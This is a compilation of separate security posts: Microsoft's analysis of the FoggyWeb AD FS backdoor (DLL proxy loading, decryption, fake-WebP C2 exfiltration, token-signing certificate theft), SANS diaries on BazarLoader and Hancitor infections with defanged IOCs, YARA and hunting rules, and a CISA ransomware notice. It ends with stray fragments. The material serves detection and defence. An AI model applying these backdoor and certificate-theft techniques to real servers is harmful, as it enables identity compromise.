The malicious loader version.dll behaves as a proxy for all legitimate version.dll export function calls. As shown below, it exports the same 17 function names as the legitimate version of version.dll.

Screenshot of dump of the legitimate version.dll Screenshot of the malicious version.dll

The export functions of the malicious version.dll are all short stubs that call a single trampoline function labeled TrampolineFunction, as seen in the screenshot below.

Screenshot of the export functions of the malicious version.dll

Below is a pseudocode for the trampoline function.

Screenshot of pseudocode for the trampoline function

This trampoline function is responsible for the following:

Calling a function (labeled as LoadDecryptExecuteBackdoor() by the analyst) to load a backdoor file from the file system, and then decrypting and executing the file in memory
Transferring execution to the initially called target function from the legitimate version of version.dll.

The trampoline function preserves the value of the arguments/registers intended for the function from the legitimate version of version.dll by saving the value of certain CPU registers. It first pushes them onto the stack before calling the LoadDecryptExecuteBackdoor() function above and then restoring them before transferring execution to the function from the legitimate version of version.dll.

Screenshot of code showing trampoline function preserves the value of the arguments/registers intended for the function from the legitimate version of version.dll by saving the value of certain CPU register

When called, LoadDecryptExecuteBackdoor() attempts to create a Windows event named {2783c149-77a7-5e51-0d83-ac0566daff96} to ensure that only one copy of the loader is actively running on the system. In a new thread, it then checks if the following file is present (hardcoded path string):

C:WindowsSystemResourcesWindows.Data.TimeZonesprisWindows.Data.TimeZones.zh-PH.pri

Windows.Data.TimeZones.zh-PH.pri is an encrypted backdoor file that is placed in the folder above. MSTIC refers to this backdoor file as FoggyWeb, and our analysis is in the next section.

Microsoft.IdentityServer.ServiceHost.exe in and of itself is an unmanaged Windows executable that is generated when the high-level AD FS managed code is compiled. When executed, the unmanaged code inside Microsoft.IdentityServer.ServiceHost.exe leverages Common Language Runtime (CLR) to run the managed AD FS code within a virtual runtime environment. This virtual runtime environment is comprised of one or more application domains, which provide a unit of isolation for the runtime environment and allow different applications to run inside separate containers within a process. The managed AD FS code is executed within an application domain inside the virtual runtime environment.

The FoggyWeb backdoor (also a managed DLL) is intended to run alongside the legitimate AD FS code (that is, within the same application domain). This means that for the FoggyWeb loader to load the backdoor alongside the AD FS code, it needs to gain access to the same application domain that the AD FS code is executed within. Since the FoggyWeb loader version.dll is an unmanaged application, it cannot directly access the virtual runtime environment that the managed AD FS code is executed within. The loader overcomes this limitation and loads the backdoor alongside the AD FS code by leveraging the CLR hosting interfaces and APIs to access the virtual runtime environment within which the AD FS code is executed.

The loader performs the following high-level actions:

Enumerate all CLRs loaded in the AD FS process Microsoft.IdentityServer.ServiceHost.exe
For each CLR, enumerate all running application domains and perform the following actions for each domain:

Read the contents of the following encrypted FoggyWeb backdoor file into memory: C:WindowsSystemResourcesWindows.Data.TimeZonesprisWindows.Data.TimeZones.zh-PH.pri
Decrypt the encrypted FoggyWeb backdoor file using the Lightweight Encryption Algorithm (LEA). The LEA-128 key schedule uses the following hardcoded master key to generate the round keys:

Screenshot of hardcoded master key to generate the round keys

After decrypting each 16-byte cipher block, the loader uses the following XOR key to decode each individual decrypted/plaintext block:

Screenshot of XOR key to decode each individual decrypted/plaintext block

This is equivalent to first LEA decrypting the entire file and then XOR decoding the decrypted data (instead of decrypting and XOR decoding each individual 16-byte block).

Create a Safe Array and copy the decrypted FoggyWeb backdoor bytes to the array. It then calls the Load() function for the current application domain to load the FoggyWeb DLL into the application domain. After the FoggyWeb DLL is loaded into the current application domain, the loader invokes the following method from the DLL: Microsoft.IdentityServer.WebExtension.WebHost.

At this point in the execution cycle, the FoggyWeb DLL is loaded into one or more application domains where the legitimate AD FS code is running. This means the backdoor code runs alongside the AD FS code with the same access and permissions as the AD FS application. Because the backdoor is loaded in the same application domain as the AD FS code, it gains programmatical access to the legitimate classes, methods, properties, fields, objects, and components used by various AD FS modules to carry out their legitimate functionality. Such access allows the FoggyWeb backdoor to directly interact with the AD FS codebase (that is, not an external disk-resident tool) and selectively invoke native AD FS methods needed to facilitate its malicious operations.

FoggyWeb backdoor

This malicious memory-resident DLL (originally named Microsoft.IdentityServer.WebExtension.dll by its developer) functions as a backdoor targeting AD FS. It is loaded by the main AD FS service process Microsoft.IdentityServer.ServiceHost.exe through a malicious loader component.

When loaded, the backdoor starts an HTTP listener that listens for HTTP GET and POST requests containing the following URI patterns:

HTTP GET URI pattern: /adfs/portal/images/theme/light01/
HTTP POST URI pattern: /adfs/services/trust/2005/samlmixed/upload

As shown below, the URI patterns are hardcoded in the backdoor and mimic the structure of the legitimate URIs used by the target’s AD FS deployment.

Screenshot of backdoor structure that mimic the structure of the legitimate URIs used by the target’s AD FS deployment.

Once the backdoor receives an HTTP request that contains one of the URI patterns above, the listener proceeds to handle the request using either an HTTP GET or HTTP POST callback/handler method (ProcessGetRequest() and ProcessGetRequest(), respectively).

Screenshot of code showing the listener handling the request using either an HTTP GET or HTTP POST callback/handler method

HTTP GET handler

The incoming HTTP GET requests that contain the URI pattern /adfs/portal/images/theme/light01/ are handled by backdoor’s ProcessGetRequest() method.

Screenshot of ProcessGetRequest() method

If an incoming HTTP GET request is issued for a file/resource with the file extension of .webp, the ProcessGetRequest() method proceeds to handle the request. Otherwise, the request is ignored by the backdoor. Also, if the requested file name matches one of the three hardcoded names below, the backdoor treats the request as a C2 command issued by the attacker.

Screenshot of code showing hardcoded names

The following URL patterns are treated as C2 commands:

/adfs/portal/images/theme/light01/profile.webp
/adfs/portal/images/theme/light01/background.webp
/adfs/portal/images/theme/light01/logo.webp

The first two C2 commands, profile.webp and background.webp (UrlGetFileNames[0] and UrlGetFileNames[1] in the screenshot above), are handled by calling the backdoor’s Service.GetCertificate() method.

Screenshot of code for Service.GetCertificate() method

As the name suggests, this method is responsible for retrieving an AD FS certificate (either the token- signing or the token encryption certificate, depending on the value of the certificateType parameter passed to the method) from the AD FS service configuration database.

Analyst note: Refer to the Appendix for an in-depth analysis of the Service.GetCertificate() method and how it obtains and decrypts either the token signing or encryption certificate.

As shown in the screenshot above, when the C2 command profile.webp (UrlGetFileNames[0]) is issued to the backdoor (by issuing an HTTP GET request for the URI /adfs/portal/images/theme/light01/profile.webp), the backdoor retrieves the token-signing certificate of the compromised AD FS server. Similarly, when the C2 command background.webp (UrlGetFileNames[1]) is issued to the backdoor (by issuing an HTTP GET request for the URI /adfs/portal/images/theme/light01/background.webp), the backdoor retrieves the token encryption certificate of the compromised AD FS server.

The third C2 command, logo.webp (UrlGetFileNames[2]), is triggered by sending an HTTP GET request to the following URI: /adfs/portal/images/theme/light01/logo.webp. The C2 command is handled by calling the backdoor’s GetInfo() method.

Screenshot of code for the backdoor’s GetInfo() method

The GetInfo() method is responsible for dumping the AD FS service configuration data of the compromised server.

Screenshot of GetInfo() method dumping the AD FS service configuration data

As shown above, the AD FS service configuration data is obtained via the ServiceSettingsData property, which retrieves the data from the AD FS service configuration database, Windows Internal Database (WID).

Before returning the output of the C2 commands (that is, the token-signing certificate, the token encryption certificate, or the AD FS service configuration data) to the C2 in an HTTP 200 response, the backdoor first obfuscates the output by calling its method named GetWebpImage().

Screenshot of code for GetWebpImage() method

The GetWebpImage() method is in charge of masquerading the output of the C2 commands as a legitimate WebP file (by adding appropriate RIFF/WebP file header magic/fields) and encoding the resulting WebP file.

Screenshot of code for GetWebpImage() method masquerading the output of the C2

GetWebpImage() uses the following helper methods to create and encode the fake WebP file that contains the C2 command output:

GetWebpImage() first invokes the Webp.GetFrame() method, which is responsible for compressing the output of the C2 command and copying the compressed version to a new array (0 padded to a multiple of 32 bytes). The length of the compressed data is added as the first four bytes of the new array.

To compress the data, GetFrame() invokes the Common.Compress() method, which is used to compress the data by leveraging the C# GZipStream compression class.

For demonstration purposes, assume the C2 command yields the following data (a 256-byte pseudo-randomly generated byte array).

Given the data above (that is, sample C2 command output), GetFrame() returns the following byte array.

Next, GetWebpImage() invokes the Webp.GetWebpHeader() method, passing in the size of the byte array returned by GetFrame() in the step above. GetWebpHeader() is responsible  for creating and returning an array containing custom RIFF WebP file magic/header bytes.

The array variable above contains the following 32-byte hardcoded RIFF/WebP header bytes.

If the size of the array passed to GetWebpHeader() (returned by GetFrame()) exceeds 8,192 bytes, the bytes at index 26 and 28 of the header bytes (initially set to 0x00) are replaced with 0x80. Otherwise, the bytes at index 26 and 28 are replaced with 0x40, as shown below.

 GetWebpHeader() then returns the custom RIFF/WebP header above to GetWebpImage().

Next, GetWebpImage() creates a new array by appending the custom RIFF/WebP header bytes returned by GetWebpHeader() to the array returned by GetFrame() (the array containing the compressed version of the C2 command output).

 

GetWebpImage() calls the Common.ProtectData() method of the backdoor to encode the portion of the new array that contains the compressed bytes (that is, it does not encode the custom RIFF/WebP header). As the second argument, GetWebpImage() passes the offset of the first compressed byte to ProtectData() (as shown in the table above, 0x20 or 32 is the offset of the first compressed byte in this case). ProtectData() uses a dynamic XOR key and a custom XOR methodology to XOR encode the compressed data.

 

Initially, the 12-byte hardcoded XOR key array contains the following (seed) bytes.

As shown in the screenshot above, each byte of compressed data is XOR’d with a byte from the XOR key array. The first byte of the compressed data (0x17) is XOR’d with the XOR key byte located at offset 8 of the key array (0x77).

After XOR’ing the first byte of the compressed data with the XOR key byte located at offset 8 of the key array, the XOR key byte itself gets overwritten with a new value.

For example, the XOR key byte located at offset 8 of the XOR key array (0x77) gets overwritten with 0xEE via the following operations.

The second byte of the compressed data (0x01) is XOR’d with the XOR key byte located at offset 9 of the key array (33 % 12 = 9) and so on until the key rolls to the first byte of the XOR array (as mentioned above, the XOR key bytes get overwritten after each encoding operation). Below is the XOR encoded version of the sample compressed array.

After the steps outlined above, GetWebpImage() returns the following sample data to the method that invokes it to obfuscate and conceal the output of each C2 command (ProcessGetRequest()).

As previously mentioned, ProcessGetRequest() returns the fake RIFF/WebP file generated above (containing stolen token-signing certificate, token encryption certificate, or the AD FS service configuration data) to the C2 in an HTTP 200 response.

If the backdoor cannot execute a C2 command successfully, it returns an HTTP 404 response to the C2 instead.

HTTP POST handler

Incoming HTTP POST requests that match the URI pattern /adfs/services/trust/2005/samlmixed/upload are handled by the ProcessPostRequest() method.

This method ensures that the ContentType value of an incoming HTTP POST request ends with “xml” (case-insensitive), and the HTTP POST data contains two XML elements named X509Certificate and SignatureValue (for example, a blob that starts with the string “<X509Certificate>” and ends with the string “</X509Certificate>”).

If the XML data contains the two elements, the backdoor performs the following actions:

Decode the values of the SignatureValue and X509Certificate elements by first decoding the values using Base64 and then calling the Common.UprotectData() method on each decoded value.

The UprotectData() method treats the first two bytes of the Base64 decoded value as a two-byte XOR key. It invokes the Common.ProtectData() method (covered in the previous section) on the rest of the data (that is, third byte on) and then uses the two-byte XOR key to XOR decode the data returned by Common.ProtectData(). In other words, UprotectData() leverages Common.ProtectData() to remove the first layer of XOR encoding and then another XOR routine to remove the second layer of XOR encoding applied to the data.

Invoke the Service.ExecuteAssembly() method to handle the decoded SignatureValue and X509Certificate values. As shown below, the decoded X509Certificate value is the first GZip decompressed/inflated by calling the Common.Decompress() method.

In a new thread, Service.ExecuteAssembly() calls Service.ExecuteAssemblyRoutine() method to handle the data.

ExecuteAssemblyRoutine() checks if the decoded X509Certificate value starts with “MZ” (or the bytes 0x4D 0x5A, the hexadecimal representation of the decimal numbers 77 and 90, as seen in the screenshot below).

If the decoded X509Certificate value starts with “MZ,” the backdoor treats the decoded data as a .NET-based assembly/payload and proceeds to call its Service.ExecuteBinary() method to load and execute the DLL payload in memory. After loading the DLL in memory, ExecuteBinary() proceeds to invoke a specific method from the loaded DLL. The method name and parameters needed to invoke the method are supplied to the backdoor within the decoded SignatureValue data.

If the decoded X509Certificate value does not start with MZ, the backdoor treats the decoded X509Certificate value as source code for a C#-based payload and calls its Service.ExecuteSource() method to dynamically compile and execute the payload in memory.

After handling the HTTP POST request containing the XML elements X509Certificate and SignatureValue, the backdoor responds to the request with an HTTP 204 response code. If the HTTP POST does not have the elements mentioned above, the backdoor responds to the request with an HTTP 404 response code.

Appendix: Obtaining and decrypting AD FS tokens

As the name suggests, the Service.GetCertificate() method is responsible for retrieving an AD FS certificate (either the token- signing or the token encryption certificate, depending on the value of the certificateType parameter passed to the method) from the AD FS service configuration database.

The method performs the following actions to retrieve the desired certificate:

Invoke another one of its methods named GetServiceSettingsDataProvider() to create an instance of type Microsoft.IdentityServer.PolicyModel.Configuration.ServiceSettingsDataProvider from the already loaded assembly Microsoft.IdentityServer.

Invoke the GetServiceSettings() member/method of the above ServiceSettingsDataProvider instance to obtain the AD FS service configuration settings.

Obtain the value of the AD FS service settings (from the SecurityTokenService property), extract the value of the EncryptedPfx blob from the service settings, and decode the blob using Base64.

Invoke another method named GetAssemblyByName() to enumerate all loaded assemblies by name and locate the already loaded assembly Microsoft.IdentityServer.Service. This method retrieves the value of two fields named _state and _certificateProtector from an object of type Microsoft.IdentityServer.Service.Configuration.AdministrationServiceState (from the Microsoft.IdentityServer.Service assembly).

The AdministrationServiceState class/object contains configuration information necessary for the execution and handling of client requests. The field _state is used to maintain the current state of the AdministrationServiceState class/object (screenshot from Microsoft.IdentityServer.Service.dll).

The AdministrationServiceState object (stored in the _state field) contains another field named _certificateProtector.

The field _certificateProtector stores an instance of the Data Protector class DkmDataProtector for Distributed Key Management (DKM). The DkmDataProtector class implements a method named Unprotect(), which ultimately calls the Unprotect() method of DKM/IDKM (screenshot from Microsoft.IdentityServer.dll).

The DKM Unprotect() method inherits a method named Unprotect() from Microsoft.IdentityServer.Dkm.DKMBase (screenshot from Microsoft.IdentityServer.Dkm.dll).

The Unprotect() method from Microsoft.IdentityServer.Dkm.DKMBase (shown above) provides the functionality to decrypt the encrypted certificate (a PKCS12 object) stored in the EncryptedPfx blob.

Armed with the knowledge about the availability of the Unprotect() method accessible via the _certificateProtector field, the backdoor invokes the Unprotect() method to decrypt the encrypted certificate stored in the EncryptedPfx blob of the desired certificate type (either the AD FS token signing or encryption certificate).

A variant of the technique described in this Appendix was publicly presented by Douglas Bienstock and Austin Baker at the TROOPERS conference in 2019 (I am AD FS and so can you: Attacking Active Directory Federated Services). However, the method used by FoggyWeb differs from the publicly presented method, in that FoggyWeb leverages the _state and _certificateProtector fields from the AdministrationServiceState class/object to facilitate access to the Data Protector class DkmDataProtector (used to gain access to and invoke the Unprotect() method).

Indicators of compromise (IOCs)

Type
Threat Name
Threat Type
Indicator

MD5
FoggyWeb
Loader
5d5a1b4fafaf0451151d552d8eeb73ec

SHA-1
FoggyWeb
Loader
c896ece073dd01191cbc1d462bc2f47161828a83

SHA-256
FoggyWeb
Loader
231b5517b583de102cde59630c3bf938155d17037162f663874e4662af2481b1

MD5
FoggyWeb
Backdoor (encrypted)
9ff9401315d0f7258a9fcde0cfdef02b

SHA-1
FoggyWeb
Backdoor (encrypted)
4597431f26424cb814c917168fa8d74d01ab7cd1

SHA-256
FoggyWeb
Backdoor (encrypted)
da0be762bb785085d36aec80ef1697e25fb15414514768b3bcaf798dd9c9b169

MD5
FoggyWeb
Backdoor (decrypted)
e9671d294ce41fe6dbb9637dc0157a88

SHA-1
FoggyWeb
Backdoor (decrypted)
85cfeccbb48fd9f498d24711c66e458e0a80cc90

SHA-256
FoggyWeb
Backdoor (decrypted)
568392bd815de9b677788addfc4fa4b0a5847464b9208d2093a8623bbecd81e6

Mitigations

Customers should review their AD FS Server configuration and implement changes to secure these systems from attacks:

Best Practices for securing AD FS and Web Application Proxy

We strongly recommend for organizations to harden and secure AD FS deployments through the following best practices:

Ensure only Active Directory Admins and AD FS Admins have admin rights to the AD FS system.
Reduce local Administrators’ group membership on all AD FS servers.
Require all cloud admins to use multi-factor authentication (MFA).
Ensure minimal administration capability via agents.
Limit on-network access via host firewall.
Ensure AD FS Admins use Admin Workstations to protect their credentials.
Place AD FS server computer objects in a top-level OU that doesn’t also host other servers.
Ensure that all GPOs that apply to AD FS servers apply only to them and not to any other servers. This limits potential privilege escalation through GPO modification.
Ensure that the installed certificates are protected against theft. Don’t store these on a share on the network and set a calendar reminder to ensure they get renewed before expiring (expired certificate breaks federation auth). Additionally, we recommend protecting signing keys or certificates in a hardware security module (HSM) attached to AD FS.
Set logging to the highest level and send the AD FS (and security) logs to a SIEM to correlate with AD authentication as well as Azure AD (or similar).
Remove unnecessary protocols and Windows features.
Use a long (>25 characters) and complex password for the AD FS service account. We recommend using a Group Managed Service Account (gMSA) as the service account, as it removes the need for managing the service account password over time by managing it automatically.
Update to the latest AD FS version for security and logging improvements (as always, test first).
When federated with Azure AD follow the best practices for securing and monitoring the AD FS trust with Azure AD.

Detections

Protecting AD FS servers is key to mitigating NOBELIUM attacks. Detecting and blocking malware, attacker activity, and other malicious artifacts on AD FS servers can break critical steps in known NOBELIUM attack chains. Microsoft Defender Antivirus detects the new NOBELIUM components discussed in this blog as the following malware:

Loader: Trojan:Win32/FoggyWeb.A!dha
Backdoor: Trojan:MSIL/FoggyWeb.A!dha

Microsoft 365 Defender

Endpoint detection and response (EDR) capabilities in Microsoft Defender for Endpoint detect malicious behavior related to this malware which is surfaced as alerts with the following titles:

A suspicious DLL was loaded by the ADFS service
Suspicious service launched
Suspicious file dropped

Azure AD Identity Protection

This kind of attack can also be detected in the cloud using Azure AD Identity Protection. It is recommended that you monitor the Azure AD Identity Protection Risk detections report for the “Token Issuer Anomaly” detection. This detection looks for anomalies in the SAML token presented to the Azure AD tenant.

Advanced hunting queries
Microsoft Defender for Endpoint

DeviceImageLoadEvents
| where FolderPath has @”C:WindowsADFS”
| where FileName has @”version.dll”

Azure Sentinel

Azure Sentinel customers can use the following detection queries to look for this activity:

Detection query: https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/Nobelium_FoggyWeb

Indicator file: https://github.com/Azure/Azure-Sentinel/tree/master/Sample%20Data/Feeds/FoggyWebIOC.csv

 

The post FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor appeared first on Microsoft Security Blog.

During this presentation, I’ll show how the effects can bring in inside the Cloud environment if was exploitable by Malware using PDF file, explaining how each session works within a binary, what are the techniques used such as packers, obfuscation with JavaScript (PDF) and more, explaining too about some anti-desassembly techniques, demonstrating as a is the action of these malwares and where it would be possible to “include” a malicious code.

400

Introduction

Another day, another wave of malware.  Although there’s plenty to find, I’ve been focusing on BazarLoader as it comes through various distribution channels.  One such channel is the “Stolen Images Evidence” campaign, which Microsoft describes here.  This campaign was pushing IcedID as we entered 2021, but it switched to BazarLoader as early as July 2021.

The “Stolen Images Evidence” campaign uses emails generated through contact forms on various websites.  So these messages don’t originate through normal spam methods.  They appear through contact form submissions describing a copyright violation to the intended victim.  These form-submitted messages include a Google firebase storage URL in the message text.  This malicious link supposedly provides proof of stolen images that resulted in a copyright violation.

However, Google’s service is being abused in this case, and the zip archive named Stolen Images Evidence.zip contains a JavaScript file designed to infect a vulnerable Windows host with BazarLoader.


Shown above:  Lnk from a copyright violation-themed form submission-generated email.

Downloaded zip archives

The downloaded zip archives are always named Stolen Images Evidence.zip.  They contain a JavaScript file named Stolen Images Evidence.js.


Shown above:  Example of a downloaded zip archive and extracted .js file.

BazarLoader from the JS file

If a victim double-clicks the extracted JavaScript file on a vulnerable Windows host, it retrieves and runs a DLL for BazarLoader malware.  The DLL is saved to the infected user’s AppDataLocalTemp directory with a .dat file extension.


Shown above:  BazarLoader DLL stored to an infected Windows host.

Infection traffic

Infection traffic is typical for what we normally see with BazarLoader.


Shown above:  Traffic from an infection filtered in Wireshark.

Indicators of Compromise (IOCs)

The following is malware retrieved from an infected Windows host.

SHA256 hash: c1cc9ec32368165e6625b2e2623ac0c3ca69bfa63a5b11e82a09bf18f6bd6410

File size: 4,763 bytes
File name: Stolen Images Evidence.zip
File description: zip archive downloaded after clicking Google Firebase Storage link

SHA256 hash: 5a22e9bde5aaed03b323e5c933c473e9ba3831f4473790a3d4394baefe809d8a

File size: 15,755 bytes
File name: Stolen Images Evidence.js
File description: JS file extracted from the above zip archive

SHA256 hash: dcf67fd6bfb62bea66f5e45d871d6c15b0c61d85c5fa9e9ded03e57f83dfc814

File size: 203,281 bytes
File location: hxxp://mabiorex[.]space/333g100/main.php
File location: C:Users[username]AppDataLocalTempmotHf.dat
File description: BazarLoader DLL retreived by the above JS file
Run method: rundll32.exe [filename],StartW

Google Firebase URL used to deliver the malicious zip archive:

hxxps://firebasestorage.googleapis[.]com/v0/b/app9-96feb.appspot.com/o/d-03rfdsbknu.html?alt=media&token=f7fc9a25-71b6-424d-aaf7-208fb11c27dd&f=025239220255728020

Malicious domain called when using the above Google Firebase URL:

172.67.145[.]134 port 443 – zvanij[.]space – HTTPS traffic

Traffic generated by the extracted JavaScript file to retrieve BazarLoader DLL:

104.21.10.6 port 80 – mabiorex[.]space – GET /333g100/index.php
104.21.10.6 port 80 – mabiorex[.]space – GET /333g100/main.php

Bazar C2 traffic:

hxxps://194.15.113[.]160/workdir/tasks/run/handle
hxxps://198.244.180[.]69/workdir/tasks/run/handle
hxxps://89.41.182[.]134/workdir/tasks/run/handle
hxxps://172.83.155[.]144/workdir/tasks/run/handle

Final words

The associated malware samples have been submitted to bazaar.abuse.ch, and they’re available using links from the above SHA256 hashes.

This campaign uses “Stolen Images Evidence” and copyright violation as its primary theme.  However, it also used a “DDoS attack proof” theme last month.  Either way, this campaign has been fairly active in 2021, and we expect it to continue throughout the rest of this year.  It will probably continue into 2022 as well.

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Here’s an extra tip to my diary entry “Simple Tips For Triage Of MALWARE Bazaar’s Daily Malware Batches”.

You can also use YARA rules together with my zipdump tool:

I’m using 2 simples rules to detect Office documents with VBA macros:

rule olevba {
    strings:
        $attribut_e = {00 41 74 74 72 69 62 75 74 00 65}
    condition:
        uint32be(0) == 0xD0CF11E0 and $attribut_e
}

rule pkvba {
    strings:
        $vbaprojectbin = “vbaProject.bin”
    condition:
        uint32be(0) == 0x504B0304 and $vbaprojectbin
}

Rule olevba is for binary (ole) office documents, and rule pkvba is for OOXML documents.

Remark: these rules are designed for triage: they might generate false positives or negatives.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

I was asked for tips to triage MALWARE Bazaar’s daily malware batches.

On Linux / macOS, you can unzip a malware batch and triage it with the file command.

There is no file command on Windows, but there are Windows versions you can install, and you can also use my file-magic tool (it’s a Python tool that uses Python module python-magic-bin).

On Windows, I don’t like to unzip the content of a daily malware batch to disk, because the malware samples have their original extension. For example, a malicious Windows executable will have extension .exe, like malware.exe. And that makes for a higher risk of inadvertenly executing malware.

What I prefer to do, is unzip the content of the ZIP file and pipe that into file-magic, like this:

The internal format I use is JSON, hence the -j and –jsoninput options.

Remark that this will not be fast: on yesterday’s malware batch (170 MB), it took almost 10 minutes. It’s more something to use in a daily bash script: download a malware batch, and triage it with zipdump and file-magic.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

large.png

We have written about MALWARE Bazaar before: a place where you can download malware samples without account or subscription.

If you need many samples, MALWARE Bazaar also publishes daily ZIP files:

Download daily malware batches

MalwareBazaar creates daily batches of malware sample). The daily batches are created once a day at midnight (00:00 UTC). Please consider that it takes a few minutes to create the batch. So I kindly ask you to not fetch the daily batch before 00:15 UTC. The daily batches are available here:

MalwareBazaar daily malware batches (ZIP password: infected)

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Introduction

On Thursday 2021-07-08, for a short while when Hancitor was initially active, if any victims clicked on a malicious link from the malspam, they would receive a XLL file instead of a malicious Word doc.  I tried one of the email links in my lab and received the malicious XLL file.  After other researchers reported they were receiving Word documents, I tried a few hours later and received a Word document instead.


Shown above:  Flow chart for my first Hancitor infection on 2021-07-08.

Since November 2020, Hancitor has consistently followed specific patterns of infection activity, and my previous diary from January 2021 is typical of what I’ve seen.  Only one change has happened recently.  Since June 8th 2021, malicious spam (malspam) pushing Hancitor switched from docs.google.com links in their messages to using feedproxy.google.com URLs, which was initially reported by @James_inthe_box, @mesa_matt, and @executemalware.


Shown above:  Flow chart for my second Hancitor infection on 2021-07-08 (what I normally see).

I’ve also seen these Google feedproxy URLs used for Hancitor infections, but I had not seen the XLL files until now.

What is an XLL file?

XLL files are Excel add-in files.  They’re DLL files specifically designed to be run by Microsoft Excel.  Think of an XLL file as an “Excel DLL.”

The emails

As usual, emails for this wave of Hancitor used a DocuSign theme, and they spoofed cabanga[.]com as the sending domain.  Just like in recent weeks, links went to a Google feedproxy URL.


Shown above:  Example of malspam pushing Hancitor from 2021-07-08.

The Google feedproxy URL leads to a malicious page on a compromised webite designed to send the initial malicious file and redirect the browser to DocuSign’s website.  I’ve described the process here and here.  This process makes it appear as if the file was offered by DocuSign, when it was actually sent through a malicious web page.


Shown above:  The website for DocuSign appears in a victim’s browser immediately after a malicious file is offered for download.

Remember, this malicious activity is not caused by DocuSign.  DocuSIgn is one of many companies that cybercriminals impersonate when distributing malware like Hancitor.  DocuSign is aware of this long-running effort by the criminals behind Hancitor, and the company has guidelines for dealing with this sort of malicious activity.

Running the XLL

When opening the XLL file, Excel asks if you want to enable the add-in as shown below.


Shown above:  Opening the malicious XLL file in Excel.

The default option was to leave the add-in disabled.  But when I opened the XLL file in my lab enviornment, I enabled all code for the add-in.  Excel immediately ran the add-in and closed.  I didn’t see any sort of fake template like we usually see when Hancitor uses a Word document as the initial file.

Infection traffic

During my first infection run with the XLL file, most of the traffic followed known patterns for Hancitor and Cobalt Strike, I saw two additional URLs as noted below.


Shown above: Traffic from my first Hancitor infection filtered in Wireshark, with the two unusual URLs noted.

Thes two URLs returned files that were saved to my Windows client in the C:UsersPublic directory.  The first URL returned an HTML file that was saved as res32.hta.  That .hta file retrieved an EXE for Hancitor which was saved as snd32sys.exe.


Shown above:  HTML (.hta) and EXE files saved the Windows host.

Hancitor showed a build number of 0707in2_wvcr in C2 traffic caused by the EXE.  During my second infection run with a Hancitor DLL, I saw a build number of 0707_wvcr,


Shown above:  C2 traffic from Hancitor EXE during my first infection.


Shown above:  C2 traffic from Hancitor DLL during my second infection.

Indicators of Compromise (IOCs)

This Github page contains 35 Google feedproxy URLs and 35 associated URLs used to send the initial malicious file.  Other indicators follow.

SHA256 hash: 73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71

File size: 24,488 bytes
File name: 0708_0112181856.xll
File description: Excel add-in (an “Excel DLL”)

SHA256 hash: da92436d2bbcdef52b11ace6e2e063e9971cefc074d194550bd425305c97cdd5

File size: 8,419 bytes
File location: hxxp://srand04rf[.]ru/92375234.xml
File location: C:UsersPublicres32.hta
File description: HTML file used to retrieve Hancitor EXE

SHA256 hash: 3db14214a9eb98b3b5abffcb314c808a25ed82456ce01251d31e8ea960f6e4e6

File size: 763,392 bytes
File location: hxxp://srand04rf[.]ru/08.jpg
File location: C:UsersPublicsnd32sys.exe
File description: Hancitor EXE

SHA256 hash: b4d402b4ab3b5a5568f35562955d5d05357a589ccda55fde5a2c166ef5f15699

File size: 898,048 bytes
File name: 0708_3355614568218.doc
File description: Word doc with macros for Hancitor

SHA256 hash: 4dc9d5ee1debdba0388fbb112d4bbbc01bb782f015e798cced3fc2edb17ac557

File size: 274,432 bytes
File location: C:Users[username]AppDataRoamingMicrosoftTemplateniberius.dll
File description: Hancitor DLL
Run method: rundll32.exe [filename],ONOQWPYIEIR

SHA256 hash: dee4bb7d46bbbec6c01dc41349cb8826b27be9a0dcf39816ca8bd6e0a39c2019

File size: 272,910 bytes
File location: hxxp://srand04rf[.]ru/7hfjsdfjks.exe
File description: EXE for Ficker Stealer malware
Note: This file was first submitted to VirusTotal on 2021-06-09.

Traffic related to Hancitor:

8.211.241[.]0 port 80 – srand04rf[.]ru – GET /92375234.xml
8.211.241[.]0 port 80 – srand04rf[.]ru – GET /08.jpg
port 80 – api.ipify.org – GET /  [not inherently malicious]
77.222.42[.]67 port 80 – sudepallon[.]com – POST /8/forum.php
194.147.78[.]155 port 80 – anspossthrly[.]ru – POST /8/forum.php
194.147.115[.]74 port 80 – thentabecon[.]ru – POST/8/forum.php

Traffic related to Ficker Stealer:

8.211.241[.]0 port 80 – srand04rf[.]ru – GET /7hfjsdfjks.exe
port 80 – api.ipify.org – GET /?format=xml  [not inherently malicious]
95.213.179[.]67 port 80 – pospvisis[.]com – TCP traffic

Traffic related to Cobalt Strike:

8.211.241[.]0 port 80 – srand04rf[.]ru – GET /0707s.bin
8.211.241[.]0 port 80 – srand04rf[.]ru – GET /0707.bin
191.101.17[.]21 port 443 – HTTPS traffic
191.101.17[.]21 port 80 – 191.101.17[.]21 – GET /5lyB
191.101.17[.]21 port 80 – 191.101.17[.]21 – GET /IE9CompatViewList.xml
191.101.17[.]21 port 80 – 191.101.17[.]21 – POST /submit.php?id=[9-digit number]

Final words

A pcap of the infection traffic from my first infection run (with the XLL file) can be found here.

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

flag.png

Original release date: July 7, 2021 | Last revised: July 8, 2021

CISA has published a new [Malware Analysis Report (MAR) on DarkSide Ransomware] and updated Alert AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks, originally released May 11, 2021. This update adds indicators of compromise associated with a DarkSide ransomware variant that executes a dynamic-link library used to delete Volume Shadow copies available on the system.

CISA encourages users and administrators to review the following resources for more information:

AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks
Malware Analysis Report MAR-10337801-1.v1

This product is provided subject to this Notification and this Privacy & Use policy.

By Asheer Malhotra, Justin Thattil and Kendall McKay.

